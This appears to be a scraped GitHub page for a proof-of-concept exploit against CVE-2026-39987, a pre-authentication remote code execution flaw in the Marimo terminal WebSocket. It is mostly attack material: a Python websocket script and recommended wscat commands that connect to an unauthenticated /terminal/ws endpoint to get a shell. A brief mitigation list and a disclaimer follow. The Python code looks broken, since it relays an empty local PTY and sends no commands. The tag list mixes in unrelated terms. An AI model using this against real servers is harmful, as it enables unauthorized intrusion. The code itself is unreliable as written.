fevar54/marimo_CVE-2026-39987_RCE_PoC

GitHub: fevar54/marimo_CVE-2026-39987_RCE_PoC

针对 Marimo < 0.23.0 的预认证 WebSocket RCE 漏洞提供 PoC 脚本与利用方案。

Stars: 0 | Forks: 0

```python import websocket import os import pty import struct import threading import sys ``` ```python def on_message(ws, message): print(message, end="") def on_error(ws, error): print(f"Error: {error}", file=sys.stderr) def on_close(ws, close_status_code, close_msg): print("Conexión cerrada") def on_open(ws): def run(): try: pty_master, pty_slave = pty.openpty() # Enviar paquetes de tamaño inicial size_packet = struct.pack(">I", 0) ws.send(size_packet) while True: # Leer salida del PTY try: data = os.read(pty_master, 1024) if data: size_packet = struct.pack(">I", len(data)) ws.send(size_packet + data) except OSError: break except Exception as e: print(f"Error PTY: {e}", file=sys.stderr) ws.close() thread = threading.Thread(target=run) thread.start() if __name__ == "__main__": target = "ws://TARGET/terminal/ws" ws = websocket.WebSocketApp(target, on_message=on_message, on_error=on_error, on_close=on_close, on_open=on_open) ws.run_forever() ``` ```python # Alternativa: script bash usando wscat # wscat -c ws://TARGET/terminal/ws ``` ```python # Alternativa: script Python con websocket-client # pip install websocket-client ``` ## 🛠️ Explotación con wscat (Recomendado) ```bash # Instalación npm install -g wscat # Conexión wscat -c ws://TARGET/terminal/ws ``` ## 🛡️ Mitigación - Actualizar a Marimo ≥ 0.23.0 - Implementar autenticación previa obligatoria para `/terminal/ws` - Restringir acceso mediante firewall o WAF - Monitorear conexiones WebSocket no autorizadas ## 🔗 Referencias - [Marimo Release Notes]() - [CVE-2026-39987 Details]() - [WebSocket Protocol]() ## ⚠️ Advertencia Esta información se proporciona con fines educativos y de investigación. El uso indebido de esta vulnerabilidad puede ser ilegal. Los responsables son únicamente usted y quien la utilice.

标签：API安全, APT, C2日志可视化, CISA项目, CRITICAL, CVE-2026-39987, CVSS 9.3, dork, JSON输出, Marimo, PE 加载器, PoC, Pre-Auth, PTY, RCE, Reverse Shell, Shell, WebSocket, Web报告查看器, 交互式终端, 依赖分析, 命令执行, 威胁情报, 开发者工具, 指纹识别, 暴力破解, 服务端安全, 未认证, 权限绕过, 漏洞, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护